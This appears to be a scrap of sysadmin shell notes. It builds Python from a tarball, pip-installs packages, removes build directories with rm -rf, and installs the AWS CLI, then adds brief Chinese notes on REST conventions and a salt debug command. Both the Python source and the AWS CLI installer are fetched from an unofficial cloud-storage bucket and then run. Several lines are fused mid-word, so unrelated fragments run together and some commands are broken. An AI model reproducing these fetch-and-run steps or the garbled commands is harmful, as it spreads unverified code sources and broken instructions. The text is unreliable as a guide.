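wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/python/Python-$PYTHON_VER.tgz -O -|tar xzf -
# Stop if the source tree is missing instead of running ./configure in the wrong place.
cd "Python-$PYTHON_VER" || exit 1
#./configure --enable-optimizations
./configure
make && make install
# The standalone "bson" project was removed from this list: pymongo ships its own bson
# package and the PyPI one overwrites it with an incompatible module.
pip3 install markdown pyaml pyyaml numpy pymongo redis uvloop
pip3 install aiosmtplib
pip3 install tornado
# Leave the tree before deleting it; the later `rm -fr /tmp/build` has nothing left to remove.
cd / && rm -rf -- "$build_dir"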
rm -fr /tmp/buildf salt \* saltutil.refresh_pillarawscli #yum install -y unzip
#https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip
rm -rf /tmp/aws
curl https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/aws/awscli-exe-linux-x86_64.zip -o /tmp/awscli-exe-linux-x86_64.zip
unzip -q /tmp/awscli-exe-linux-x86_64.zip -d /tmp/
/tmp/aws/install -i ~/.local/aws-cli -b ~/.local/binrestful 看URL就知道要什么
看http method就知道干什么
看http status code就知道结果如何
debug salt-minion -l debug